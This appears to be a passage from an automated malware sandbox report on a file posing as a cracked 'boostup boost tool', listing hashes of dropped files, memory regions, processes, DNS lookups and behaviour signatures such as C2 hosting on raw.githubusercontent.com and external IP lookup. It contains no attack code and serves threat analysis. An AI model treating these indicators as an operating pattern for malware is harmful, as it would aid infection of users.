SHA256 0046eb32f873cde62cf29af02687b1dd43154e9fd10e0aa3d8353d3debb38790
SHA512 20edc7eae5c0709af5c792f04a8a633d416da5a38fc69bd0409afe40b7fb1afa526de6fe25d8543ece9ea44fd6baa04a9d316ac71212ae9638bdef768e661e0f

C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\psutil\_psutil_windows.pyd

MD5 ebefbc98d468560b222f2d2d30ebb95c
SHA1 ee267e3a6e5bed1a15055451efcccac327d2bc43
SHA256 67c17558b635d6027ddbb781ea4e79fc0618bbec7485bd6d84b0ebcd9ef6a478
SHA512 ab9f949adfe9475b0ba8c37fa14b0705923f79c8a10b81446abc448ad38d5d55516f729b570d641926610c99df834223567c1efde166e6a0f805c9e2a35556e3

C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\python3.dll

MD5 34e49bb1dfddf6037f0001d9aefe7d61
SHA1 a25a39dca11cdc195c9ecd49e95657a3e4fe3215
SHA256 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281
SHA512 edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

MD5 6a9ca97c039d9bbb7abf40b53c851198
SHA1 01bcbd134a76ccd4f3badb5f4056abedcff60734
SHA256 e662d2b35bb48c5f3432bde79c0d20313238af800968ba0faa6ea7e7e5ef4535
SHA512 dedf7f98afc0a94a248f12e4c4ca01b412da45b926da3f9c4cbc1d2cbb98c8899f43f5884b1bf1f0b941edaeef65612ea17438e67745962ff13761300910960d

C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\libffi-8.dll

MD5 32d36d2b0719db2b739af803c5e1c2f5
SHA1 023c4f1159a2a05420f68daf939b9ac2b04ab082
SHA256 128a583e821e52b595eb4b3dda17697d3ca456ee72945f7ecce48ededad0e93c
SHA512 a0a68cfc2f96cb1afd29db185c940e9838b6d097d2591b0a2e66830dd500e8b9538d170125a00ee8c22b8251181b73518b73de94beeedd421d3e888564a111c1

memory/392-293-0x0000019C589E0000-0x0000019C589E8000-memory.dmp

memory/1404-305-0x00007FF949EA0000-0x00007FF949EC3000-memory.dmp

memory/1404-319-0x00007FF949EA0000-0x00007FF949EC3000-memory.dmp

memory/1404-315-0x00007FF939470000-0x00007FF939990000-memory.dmp

memory/1404-314-0x00007FF949530000-0x00007FF9495FD000-memory.dmp

memory/1404-313-0x00007FF94A930000-0x00007FF94A963000-memory.dmp

memory/1404-311-0x00007FF94B460000-0x00007FF94B479000-memory.dmp

memory/1404-310-0x00007FF949080000-0x00007FF9491F7000-memory.dmp

memory/1404-304-0x00007FF93A070000-0x00007FF93A659000-memory.dmp

memory/1404-318-0x00007FF939F50000-0x00007FF93A06C000-memory.dmp

memory/1404-309-0x00007FF94B680000-0x00007FF94B6A3000-memory.dmp

memory/3264-369-0x00007FF62F120000-0x00007FF62FF29000-memory.dmp

memory/1404-391-0x00007FF949EA0000-0x00007FF949EC3000-memory.dmp

memory/1404-404-0x00007FF939F50000-0x00007FF93A06C000-memory.dmp

memory/1404-403-0x00007FF949FD0000-0x00007FF949FDD000-memory.dmp

memory/1404-402-0x00007FF94ABC0000-0x00007FF94ABD4000-memory.dmp

memory/1404-400-0x00007FF949530000-0x00007FF9495FD000-memory.dmp

memory/1404-399-0x00007FF94A930000-0x00007FF94A963000-memory.dmp

memory/1404-398-0x00007FF94B430000-0x00007FF94B43D000-memory.dmp

memory/1404-397-0x00007FF94B460000-0x00007FF94B479000-memory.dmp

memory/1404-396-0x00007FF949080000-0x00007FF9491F7000-memory.dmp

memory/1404-401-0x00007FF939470000-0x00007FF939990000-memory.dmp

memory/1404-395-0x00007FF94B680000-0x00007FF94B6A3000-memory.dmp

memory/1404-394-0x00007FF9512E0000-0x00007FF9512F9000-memory.dmp

memory/1404-393-0x00007FF951300000-0x00007FF95132D000-memory.dmp

memory/1404-392-0x00007FF94DC90000-0x00007FF94DC9F000-memory.dmp

memory/1404-390-0x00007FF93A070000-0x00007FF93A659000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-22 13:59

Reported

2024-06-22 14:02

Platform

win10v2004-20240508-en

Max time kernel

76s

Max time network

71s

Command Line

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api64.ipify.org N/A N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 api64.ipify.org udp

Files

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\main.exe

MD5 49d08125658272ff5c325f8789b6e6ee
SHA1 33629d347573c8ae2c7f34fadf70cd91fdb4dcb2
SHA256 fce000dc1908a48dec2c9b16d4ab4aca97bbefc0118a41fcd36a03228acaa40c
SHA512 68ba097ccc0d324ac9ec43f9ab3056e4c7d05519a69353994062b60ad44a0d31955a8845b5e4d2fdfa90b7646d552a30e56ec4746dae521fe05b74f248ce43f0

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\python311.dll

MD5 65e381a0b1bc05f71c139b0c7a5b8eb2
SHA1 7c4a3adf21ebcee5405288fc81fc4be75019d472
SHA256 53a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a
SHA512 4db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39

C:\Users\Admin\AppData\Local\Temp\onefile_2452_133635384415940006\VCRUNTIME140.dll

MD5 4585a96cc4eef6aafd5e27ea09147dc6
SHA1 489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256 a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512 d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\yaml\_yaml.pyd

MD5 e383f5064e9afe76cd25b49d00ffa275
SHA1 5073f97495ae0694bf79865852eda271a309f50f
SHA256 a0c62c035cd131ce1e574742d91d415de761a5c5d5c35a4f36a41b8e0b0ab195
SHA512 34c4b567c628d0c14f330dae8dd069b08940e087666666db9aa4497680f3111ab580f4ac702d726a7d6ab85fd4e9b27a952800a2b5271edb50374a30f15bc5b5

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

MD5 22c4892caf560a3ee28cf7f210711f9e
SHA1 b30520fadd882b667ecef3b4e5c05dc92e08b95a
SHA256 e28d4e46e5d10b5fdcf0292f91e8fd767e33473116247cd5d577e4554d7a4c0c
SHA512 edb86b3694fff0b05318decf7fc42c20c348c1523892cce7b89cc9c5ab62925261d4dd72d9f46c9b2bda5ac1e6b53060b8701318b064a286e84f817813960b19
